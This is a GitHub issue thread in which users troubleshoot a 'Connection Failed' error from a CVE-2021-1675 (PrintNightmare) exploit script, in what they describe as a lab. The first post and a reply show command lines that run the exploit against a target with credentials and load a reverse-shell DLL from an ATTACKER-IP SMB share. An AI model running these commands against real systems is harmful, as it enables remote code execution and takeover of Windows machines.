CVE-2021-1675 icon indicating copy to clipboard operation
CVE-2021-1675 copied to clipboard

Connection Failed

Open kolet opened this issue 4 years ago • 6 comments

hi, i tried to run the python script via windows cmd , and linux ubuntu 20 WSL both result in the same error

C:\Users\kolet\Downloads>python3 CVE-2021-1675.py hihi:[email protected] \\192.168.5.101\sft\re.dll [*] Connecting to ncacn_np:192.168.5.52[\PIPE\spoolss] [-] Connection Failed

i shared the re.dll with samba on linux , since it was in WSL i thought it did not work, so i just shared a folder with the re.dll inside and gave everyone permission to read/write into the folder and disable password requirement in the advanced sharing settings .

i made sure 192.168.5.52 could reach \192.168.5.101\sft\ manually (and it could.)

what am i doing wrong ?

thanks !

kolet avatar Jul 09 '21 16:07 kolet

This is the syntax I have had the most success with in my lab. Also, my Metasploit is rusty, but I was only able to craft a working dll via shell_reverse_tcp I am still getting errors with meterpreter/handler, though. Best of luck.

chmod +x CVE-2021-1675.py ./CVE-2021-1675.py whatever.local/lowpriv:Passw0rd1@DC-IP-HERE '\ATTACKER-IP\smb\reverse_64.dll'

wafflesx90 avatar Jul 14 '21 02:07 wafflesx90

I have the Same error

muratberisha98 avatar Aug 17 '21 21:08 muratberisha98

I got exactly the same error.

MYavuzYAGIS avatar Sep 17 '21 14:09 MYavuzYAGIS

I got the same error, Any leads?

SBK-DS avatar Nov 26 '21 05:11 SBK-DS

Did anybody work this out? It's an old thread but I'm struggling with it. Please let me know!! :)

JasmineScholz avatar May 26 '22 03:05 JasmineScholz